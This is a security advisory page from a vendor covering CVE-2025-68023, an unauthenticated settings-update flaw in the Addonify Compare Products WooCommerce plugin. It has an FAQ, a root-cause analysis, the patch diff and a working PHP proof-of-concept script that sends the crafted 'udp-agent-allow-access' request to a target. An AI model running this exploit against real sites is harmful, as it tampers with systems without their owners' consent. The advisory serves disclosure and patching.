What is CVE-2025-68023?

CVE-2025-68023 is a medium severity vulnerability in the Addonify – Compare Products For WooCommerce plugin, allowing unauthenticated attackers to update plugin settings due to a missing authorization check. This flaw affects all versions up to and including 1.1.17.

How does the vulnerability work?

The vulnerability exists in the `process_user_tracking_choice` function, which does not verify user capabilities. An attacker can send a specially crafted HTTP GET request with the `udp-agent-allow-access` parameter to change user tracking preferences without authentication.

Who is affected by this vulnerability?

Any WordPress site using the Addonify – Compare Products For WooCommerce plugin version 1.1.17 or earlier is at risk. Administrators should check their plugin version and update if necessary.

How can I check if my site is vulnerable?

To determine if your site is vulnerable, check the version of the Addonify – Compare Products For WooCommerce plugin installed on your WordPress site. If it is version 1.1.17 or earlier, your site is vulnerable.

What does the CVSS score of 5.3 indicate?

A CVSS score of 5.3 indicates a medium severity vulnerability. This means that while the vulnerability can be exploited, it requires some level of skill and access, and the potential impact is moderate.

What are the practical risks of this vulnerability?

If exploited, an attacker could change plugin settings, potentially disrupting site analytics or user tracking. This could affect the site’s operational state and serve as a stepping stone for further attacks.

What is a proof of concept (PoC)?

A proof of concept is a demonstration that shows how the vulnerability can be exploited. In this case, the PoC illustrates how an attacker can send a GET request to alter plugin settings without authentication.

What should I do if I cannot update the plugin immediately?

If immediate updating is not possible, consider disabling the plugin until it can be updated to prevent potential exploitation. Monitor your site for any unusual activity as a precaution.

How does the patch in version 1.1.18 work?

The patch in version 1.1.18 adds authorization checks to the `process_user_tracking_choice` function, ensuring that only logged-in users with the `manage_options` capability can modify settings. This prevents unauthorized access.

Can this vulnerability lead to further attacks?

Yes, by altering plugin settings, an attacker could disrupt normal operations or gain insights into user behavior, which could be leveraged for more sophisticated attacks against the site.

Is there any additional information available about this vulnerability?

For more detailed information, refer to the official CVE database entry for CVE-2025-68023 or the plugin’s changelog on the WordPress repository.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2025-68023: Addonify – Compare Products For WooCommerce <= 1.1.17 – Missing Authorization to Unauthenticated Settings Update (addonify-compare-products)

Q: How can I fix or mitigate this issue?

The vulnerability is patched in version 1.1.18 of the Addonify – Compare Products For WooCommerce plugin. Update to this version or later to mitigate the risk.

CVE ID CVE-2025-68023

Plugin addonify-compare-products

Severity Medium (CVSS 5.3)

CWE 862

Vulnerable Version 1.1.17

Patched Version 1.1.18

Disclosed February 3, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-68023:
The Addonify – Compare Products for WooCommerce plugin, up to version 1.1.17, contains a Missing Authorization vulnerability. This flaw allows unauthenticated attackers to modify plugin settings, directly impacting the plugin’s configuration and functionality.

Atomic Edge research identifies the root cause in the `process_user_tracking_choice` function within the file `/includes/udp/class-udp-agent.php`. The function handles a user tracking preference request via the `udp-agent-allow-access` GET parameter. Prior to version 1.1.18, the function performed no capability or authentication checks. Any HTTP request triggering this function could execute its logic, which updates plugin settings based on user input.

The exploitation vector is a direct HTTP GET request to the site’s homepage or any page where the plugin’s UDP agent logic is active. An attacker sends a request with the `udp-agent-allow-access` parameter set to either `yes` or `no`. For example, a request to `https://target.com/?udp-agent-allow-access=yes` would be processed by the vulnerable function, altering the plugin’s user tracking consent setting without requiring any authentication.

The patch in version 1.1.18 adds an authorization check at the beginning of the `process_user_tracking_choice` function. The fix verifies the user is both logged in (`is_user_logged_in()`) and possesses the `manage_options` capability (`current_user_can(‘manage_options’)`). If either check fails, the user is redirected to the homepage and the function execution halts. This change restricts endpoint access to administrators only, remediating the missing authorization flaw.

Successful exploitation allows an unauthenticated attacker to change plugin settings. The specific function controls user tracking preferences. An attacker could disable tracking or manipulate other related configuration values the function updates. This could disrupt expected plugin behavior, affect site analytics, or serve as a stepping stone in a broader attack chain by altering the plugin’s operational state.

Differential between vulnerable and patched code

Code Diff

--- a/addonify-compare-products/addonify-compare-products.php
+++ b/addonify-compare-products/addonify-compare-products.php
@@ -10,8 +10,8 @@
  * Plugin Name:       Addonify - Compare Products For WooCommerce
  * Plugin URI:        https://wordpress.org/plugins/addonify-compare-products/
  * Description:       Addonify Compare Products is a WooCommerce extension that allows website visitors to compare multiple products on your online store.
- * Version:           1.1.17
- * Tested up to:      6.8
+ * Version:           1.1.18
+ * Tested up to:      6.9.1
  * Requires at least: 6.3
  * Requires PHP:      7.4
  * Author:            Addonify
@@ -28,7 +28,7 @@
 	die;
 }

-define( 'ADDONIFY_COMPARE_PRODUCTS_VERSION', '1.1.17' );
+define( 'ADDONIFY_COMPARE_PRODUCTS_VERSION', '1.1.18' );
 define( 'ADDONIFY_COMPARE_PRODUCTS_BASENAME', plugin_basename( __FILE__ ) );
 define( 'ADDONIFY_CP_DB_INITIALS', 'addonify_cp_' );
 define( 'ADDONIFY_CP_PLUGIN_PATH', dirname( __FILE__ ) );
--- a/addonify-compare-products/includes/udp/class-udp-agent.php
+++ b/addonify-compare-products/includes/udp/class-udp-agent.php
@@ -172,6 +172,11 @@
 	 * @since    1.0.0
 	 */
 	private function process_user_tracking_choice() {
+		// Verify if the user is logged in and has the capability to manage options.
+		if ( ! is_user_logged_in() || ! current_user_can( 'manage_options' ) ) {
+			wp_safe_redirect( home_url() );
+			exit;
+		}

 		$users_choice = isset( $_GET['udp-agent-allow-access'] ) ? sanitize_text_field( wp_unslash( $_GET['udp-agent-allow-access'] ) ) : ''; //phpcs:ignore

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-68023 - Addonify – Compare Products For WooCommerce <= 1.1.17 - Missing Authorization to Unauthenticated Settings Update
<?php

$target_url = 'https://example.com/';

// The vulnerable parameter
$parameter = 'udp-agent-allow-access';
// Payload to set the user tracking choice. Expected values are 'yes' or 'no'.
$payload = 'yes';

// Construct the exploit URL
$exploit_url = $target_url . '?' . $parameter . '=' . urlencode($payload);

// Initialize cURL session
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $exploit_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
// Follow redirects to see the final response
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);

// Execute the request
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);

// Check for cURL errors
if (curl_errno($ch)) {
    echo 'cURL Error: ' . curl_error($ch) . "n";
} else {
    echo "Request sent to: $exploit_urln";
    echo "HTTP Response Code: $http_coden";
    // A successful exploitation attempt may result in a 200 OK or a redirect.
    // The vulnerability is a logic flaw, so a non-error response often indicates the request was processed.
    if ($http_code >= 200 && $http_code < 300) {
        echo "Potential exploitation successful. Plugin settings may have been altered.n";
    } else {
        echo "Request may have been blocked or failed.n";
    }
}

curl_close($ch);

?>

Frequently Asked Questions

What is CVE-2025-68023?
Overview of the vulnerability
CVE-2025-68023 is a medium severity vulnerability in the Addonify – Compare Products For WooCommerce plugin, allowing unauthenticated attackers to update plugin settings due to a missing authorization check. This flaw affects all versions up to and including 1.1.17.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability exists in the `process_user_tracking_choice` function, which does not verify user capabilities. An attacker can send a specially crafted HTTP GET request with the `udp-agent-allow-access` parameter to change user tracking preferences without authentication.
Who is affected by this vulnerability?
Identifying vulnerable installations
Any WordPress site using the Addonify – Compare Products For WooCommerce plugin version 1.1.17 or earlier is at risk. Administrators should check their plugin version and update if necessary.
How can I check if my site is vulnerable?
Version verification process
To determine if your site is vulnerable, check the version of the Addonify – Compare Products For WooCommerce plugin installed on your WordPress site. If it is version 1.1.17 or earlier, your site is vulnerable.
How can I fix or mitigate this issue?
Updating the plugin
The vulnerability is patched in version 1.1.18 of the Addonify – Compare Products For WooCommerce plugin. Update to this version or later to mitigate the risk.
What does the CVSS score of 5.3 indicate?
Understanding severity levels
A CVSS score of 5.3 indicates a medium severity vulnerability. This means that while the vulnerability can be exploited, it requires some level of skill and access, and the potential impact is moderate.
What are the practical risks of this vulnerability?
Potential consequences of exploitation
If exploited, an attacker could change plugin settings, potentially disrupting site analytics or user tracking. This could affect the site’s operational state and serve as a stepping stone for further attacks.
What is a proof of concept (PoC)?
Demonstrating the vulnerability
A proof of concept is a demonstration that shows how the vulnerability can be exploited. In this case, the PoC illustrates how an attacker can send a GET request to alter plugin settings without authentication.
What should I do if I cannot update the plugin immediately?
Temporary mitigation strategies
If immediate updating is not possible, consider disabling the plugin until it can be updated to prevent potential exploitation. Monitor your site for any unusual activity as a precaution.
How does the patch in version 1.1.18 work?
Details of the fix
The patch in version 1.1.18 adds authorization checks to the `process_user_tracking_choice` function, ensuring that only logged-in users with the `manage_options` capability can modify settings. This prevents unauthorized access.
Can this vulnerability lead to further attacks?
Potential for escalation
Yes, by altering plugin settings, an attacker could disrupt normal operations or gain insights into user behavior, which could be leveraged for more sophisticated attacks against the site.
Is there any additional information available about this vulnerability?
Further resources
For more detailed information, refer to the official CVE database entry for CVE-2025-68023 or the plugin’s changelog on the WordPress repository.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations